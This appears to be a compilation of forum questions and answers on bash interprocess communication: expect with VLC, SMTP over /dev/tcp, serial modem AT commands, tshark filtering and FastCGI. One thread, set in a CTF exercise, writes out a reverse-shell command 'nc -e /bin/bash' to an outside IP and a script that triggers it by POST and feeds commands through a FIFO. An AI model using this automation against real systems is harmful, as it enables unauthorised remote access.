I'm writing a bash script to send commands to an already launched program, and the only way I found on the internet was through named pipes.
Is there an easier way to do it all inside the same script? Named pipes have the problem that I need three scripts: one to manage the program, another to send the information from the main script, and a reader to pass the information on to the program (if I understood the link above correctly).
That is a problem, because the manager has to call the others, and I need the reader to receive an array of files as input, which I found no way of doing; if you know how, please answer this other question.
Thank you
--- 26/01/2012 ---
After Carl's post I tried:
#!/bin/bash
MUS_DIR="/home/foo/dir/music"
/usr/bin/expect <<-_EOF_
spawn vlc --global-key-next n $MUS_DIR
sleep 5
send 'n'
sleep 5
send "n"
_EOF_
But it doesn't work: it just spawns VLC but doesn't skip the song.
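(For reference: in Tcl, which is what expect runs, single quotes are not quoting characters, so send 'n' transmits the three characters ', n, ' rather than just n; and the normal VLC GUI does not read keystrokes from its standard input at all, so characters sent by expect never reach it. A variant that drives VLC's remote-control interface instead might look like the sketch below; the -I rc interface and the "next"/"quit" commands are assumptions about VLC, and the 5-second sleeps are arbitrary.)

#!/bin/bash
MUS_DIR="/home/foo/dir/music"
/usr/bin/expect <<-_EOF_
spawn vlc -I rc $MUS_DIR
sleep 5
send "next\r"
sleep 5
send "next\r"
send "quit\r"
expect eof
_EOF_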
You might want to check out expect(1).
More details about the program you want to communicate with would be useful.
Essentially you just need some sort of inter-process communication. Files/pipes/signals/sockets could be used. For example, write to a specific file in the script and then send the program a signal so it knows to check the file.
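As a sketch of that last idea, assuming the receiving side is something you control (here it is just another shell script; the command file, PID file and choice of SIGUSR1 are arbitrary):

#!/bin/bash
# receiver.sh -- the long-running "program"
CMD_FILE=/tmp/prog_cmd

handle_cmd() {
    cmd=$(cat "$CMD_FILE")          # pick up whatever the controller wrote
    echo "received command: $cmd"   # react to it here
}
trap handle_cmd USR1

echo "$$" > /tmp/prog.pid           # let the controller find this process
while true; do sleep 1; done        # main loop; the trap fires between sleeps

# controller side, in the main script:
echo "next" > /tmp/prog_cmd
kill -USR1 "$(cat /tmp/prog.pid)"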
Depending on your language of choice, and on how much time you can spend on this and how big the project will be, you could have the launched program use a thread that listens on a port for TCP packets and reacts to them. Then your bash script could netcat the information to it, or send an HTTP POST with curl.
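The bash side of that is short; the host, port and payload below are placeholders:

printf 'next\n' | nc localhost 5000                               # raw TCP via netcat
curl -X POST http://localhost:5000/control --data 'cmd=next'      # or HTTP, if the program speaks it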
Are you sure it's not possible for the application to be started by the script itself? That would allow the script to just pass arguments or define some environment variables.
I want to make a bash script that automatically talks to SMTP on port 25, sends an email, and then asserts that the email was queued.
I have this much code so far:
https://github.com/kristijorgji/docker-mailserver/blob/main/tests/smpt.bash
but it is not working; I always get
improper command pipelining after DATA from unknown[172.21.0.1]: subject: Test 2022-07-22_17_10_09\r\nA nice test\r\n\r\n
That might also be fine, but please double-check my script and give suggestions for improvement if it is okay, or fixes if it is not.
How can I automate this process so that I can re-run the script after every configuration change?
I want to know the best practices
The PIPELINING extension to ESMTP, which is specified in RFC 2920, says:
The EHLO, DATA, VRFY, EXPN, TURN, QUIT, and NOOP commands can only appear as the last command in a group since their success or failure produces a change of state which the client SMTP must accommodate.
This means that you can remove the sleep commands after MAIL FROM and RCPT TO, but you should introduce a sleep after echo "data" before continuing with the message to be delivered. (Just to be clear: you need to wait for the server's response; sleep is just a hack to achieve that.)
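A sketch of the "wait for the response" approach using bash's /dev/tcp instead of fixed sleeps (host, port and addresses are placeholders, and no authentication or TLS is attempted):

#!/bin/bash
exec 3<>/dev/tcp/localhost/25        # one FD for reading and writing

smtp_read() {                        # read one (possibly multi-line) reply
    local line
    while IFS= read -r line <&3; do
        line=${line%$'\r'}           # strip the trailing CR
        echo "S: $line"
        case $line in
            [0-9][0-9][0-9]\ *) break ;;   # "250 ..." ends a reply, "250-..." continues it
        esac
    done
}

smtp_send() { printf '%s\r\n' "$1" >&3; smtp_read; }

smtp_read                            # server greeting
smtp_send "EHLO client.example"
smtp_send "MAIL FROM:<from@example.com>"
smtp_send "RCPT TO:<to@example.com>"
smtp_send "DATA"
printf 'Subject: test\r\n\r\nA nice test\r\n.\r\n' >&3
smtp_read                            # reply to the queued message
smtp_send "QUIT"
exec 3>&-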
I'm doing an exercise (basically just a CTF) where we exploit some vulnerable machines. For example, by sending a specially crafted POST request, we can make a machine execute something like
nc -e /bin/bash 10.0.0.2 2546
What I want to do is script all of this, to make it easier:
Set up a listener on a specific port
Send a POST request to make the machine connect back
Send arbitrary data to the server, e.g. to escalate privileges
Present the user with the shell (which is carried over nc)
This is not a post about how to hack it or escalate privileges, but my scripting capabilities (especially in bash!) are not the best.
The problem is when I reach step 2. For obvious reasons, I can't start nc -lvp 1234 before sending the POST request, since it blocks. And I'm fairly sure multithreading in bash is not possible (...somebody has probably managed it, though).
nc -lp $lp & # Run in background - probably not a good solution
curl -X POST $url --data "in_command=do_dirty_stuff" # Send data
* MAGIC CONNECTION *
And let's say I actually succeed in getting a connection back home: how would I manage to send data from my script, through netcat, before presenting the user with a working shell? Maybe something with piping the netcat data to a file and using that as a "buffer"?
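The FIFO idea could be sketched roughly like this (nc flags differ between netcat flavours, and $lp, $url, the sleep and the commands are all placeholders):

fifo=$(mktemp -u)
mkfifo "$fifo"

nc -lp "$lp" < "$fifo" &         # listener: stdin comes from the FIFO, output goes to the terminal
nc_pid=$!

exec 3> "$fifo"                  # keep a write end open so nc never sees EOF

curl -X POST "$url" --data "in_command=do_dirty_stuff"    # trigger the connect-back

sleep 2                          # crude: give the target time to connect
printf 'id\nwhoami\n' >&3        # automated commands go first

cat >&3                          # then relay the user's keyboard to the remote shell

exec 3>&-                        # closing the write end ends the session
wait "$nc_pid"
rm -f "$fifo"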
I know there are a lot of questions here, and they can't all be covered in one answer, but I'd like to hear how people would approach this, or whether it's completely ridiculous to do in bash.
I am connecting to a modem over a serial port and trying to figure out how to send an AT command, and add conditionals depending on the output. I can connect using screen or minicom to /dev/ttyAMA0 and send the AT command and receive the response OK, but when I use
echo -en "AT" >/dev/ttyAMA0 && cat /dev/ttyAMA0
I only see what I am echoing, not the response. I need to be able to send the AT command, check whether the output is OK or ERROR, and then, based on that response, do something different. Why am I not getting any response from the serial device?
I am trying to create a bash script that can connect to the modem and send a text message, but need to know if there are errors rather than just blasting things through assuming it is working. Is there a better way to accomplish this?
Scripting a dialog through a terminal-like port is a complex enough problem that people have written special tools to do it; the classic is the Expect/Tcl library. I think Tcl is simple to learn, but there are Expect bindings for other scripting languages.
I found this script that uses Expect to communicate over a serial port.
After echoing, you cannot simply cat the device file. You need to start a listening loop:
while read -r str; do
    echo "modem said: $str"   # $str contains a line of text returned from the modem
done < /dev/ttyAMA0
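For the OK/ERROR check from the question, a sketch along these lines may be closer to what is needed (device, baud rate, line settings and the 3-second timeout are assumptions):

#!/bin/bash
dev=/dev/ttyAMA0
stty -F "$dev" 115200 raw -echo         # raw mode, no local echo

exec 3<>"$dev"                          # one FD for both reading and writing

printf 'AT\r' >&3                       # most modems expect CR-terminated commands

resp=""
while IFS= read -r -t 3 line <&3; do    # give up after 3 seconds of silence
    line=${line%$'\r'}
    case $line in
        OK)    resp=OK;    break ;;
        ERROR) resp=ERROR; break ;;
    esac
done

if [ "$resp" = OK ]; then
    echo "modem answered OK"            # e.g. go on and send the SMS here
else
    echo "no OK from modem (got: ${resp:-nothing})" >&2
fi

exec 3>&-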
I have a problem where I need to inspect the TCP packets on a machine.
We use a closed-source VoIP system here, and I want to open a program when an incoming call happens.
The VoIP system's software shows the call, but it has no functionality to call external software.
I used Wireshark to capture my PC's packets, and I'm able to filter the packets easily with
ip.src==AAA.BBB.CCC.DDD && giop.request_op == "pushEvents" && giop.len > 300 && tcp contains "CallInfo"
Now I could work with this packet if my custom software could read it from a pipe.
Is there a library for PureBasic that can do this capturing and filtering?
Alternatively, is there a way to start Wireshark from the console so that it outputs the filtered data to a pipe? (I noticed tshark could do this, but it does not seem to support this display filter.)
Thanks for any constructive answer that doesn't just tell me to RTFM ;-)
tshark is just a terminal/console interface to the same engine as the GUI Wireshark. It should support all the same protocol dissectors and display filters as the GUI app.
I'm pretty sure you're doing something wrong while launching it. Please provide more info about why you didn't manage to get tshark working.
To solve your problem: I would launch tshark with the filter you've come up with, so that only the matching packets are written to the output. Then I would pipe that output into a simple Python/bash/whatever script that launches the app you want on every line of input (see the sketch after the list below).
You will also need to take care of specific situations like:
ensuring the input line is what it was supposed to be (you can get error lines etc. from tshark)
perhaps avoiding launching the app if it's already running
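A rough shape for that pipe (the interface name and the launched command are placeholders; -Y is the display-filter option in current tshark, older releases used -R):

tshark -l -i eth0 \
    -Y 'ip.src==AAA.BBB.CCC.DDD && giop.request_op == "pushEvents" && giop.len > 300 && tcp contains "CallInfo"' |
while IFS= read -r line; do
    [ -n "$line" ] || continue                # skip empty lines; add stricter sanity checks as needed
    pgrep -x myapp > /dev/null || myapp &     # don't start a second copy while one is running
done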
I would like to use FastCGI with shell scripts.
I have found several tutorials about writing CGI scripts in shell, but nothing about FastCGI, and I guess this is not the same thing.
Is it possible, and how?
Thank you
Edit: Ignacio: Thank you, but this link is 14 years old and says that this is not currently supported. Is it still unsupported?
The whole point of FastCGI is to avoid spawning a new process for each incoming connection. By its very nature, a shell script will spawn many processes during its execution unless you restrict yourself greatly (no cat, awk, sed, grep, etc.). So from the start, if you're going to use a shell script, you may as well use regular CGI instead of FastCGI.
If you're determined anyway, the first big hurdle is that you have to accept() connections on a listening socket provided by the webserver. As far as I know, there is no UNIX tool that does this. Now, you could write one in some other language, and it could run your shell script once for each incoming connection. But that is exactly what normal CGI does, and I guarantee it does it better than the custom program you or I would write. So again, stick with normal CGI if you want to use shell scripts.
"If you're determined anyway, the first big hurdle is that you have to accept() connections on a listening socket provided by the webserver. As far as I know, (...)" there is one C program doing nearly this: exec_with_piped.c
(it's using pipes, not sockets, but the C code should be easily adapted for your purpose)
Look at "Writing agents in sh: conversing through a pipe"
http://okmij.org/ftp/Communications.html
Kalou
No.

"I apologize in advance if this is a dumb question, but is it conceivable to use a mere shell script (sh or ksh) as a FastCGI program, and if so, how?"

You cannot use a simple shell script as a FastCGI program. Since a shell script cannot persist across multiple HTTP requests, it cannot be used as a FastCGI application. For the program to handle multiple HTTP requests in its own lifetime (i.e. not just handle one request and die, like CGI applications do), it needs some means of communicating with the web server to receive a request and to send the reply back to the server after handling it. This communication is accomplished via the FCGI library, which implements the above and currently supports only a subset of programming languages, like C, Perl, Tcl, Java... In short, it does NOT support shell.

Hope that cleared it up a bit.

Stanley.
From http://www.fastcgi.com/:
FastCGI is simple because it is actually CGI with only a few extensions.
Also:
Like CGI, FastCGI is also language-independent.
So you can use FastCGI with shell scripts or any other kind of scripts, just like CGI.
Tutorials for CGI are useful for learning FastCGI too, except maybe for the particulars of setting up the web server.
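For completeness, the shell side of a plain CGI-style script is tiny; here is a minimal sketch (the web-server configuration is where CGI and FastCGI deployments actually differ):

#!/bin/sh
# minimal CGI response: headers, a blank line, then the body
echo "Content-Type: text/plain"
echo ""
echo "Hello from a shell script"
echo "Query string: $QUERY_STRING"      # QUERY_STRING is set by the web server for CGI requests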